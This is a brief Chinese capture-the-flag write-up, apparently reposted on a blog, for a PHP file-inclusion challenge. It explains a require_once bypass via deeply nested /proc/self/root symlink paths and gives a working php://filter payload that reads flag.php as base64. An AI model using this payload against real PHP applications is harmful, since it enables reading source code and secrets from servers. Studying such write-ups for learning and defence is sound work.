前言
做了一下。
Web
php dest
文件包含,但是需要绕过require_once,这题实际来源于[WMCTF2020]Make PHP Great Again:
PHP最新版的小Trick, require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含
构造payload:
?file=php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php
原创文章,作者:jamestackk,如若转载,请注明出处:https://blog.ytso.com/tech/php/272793.html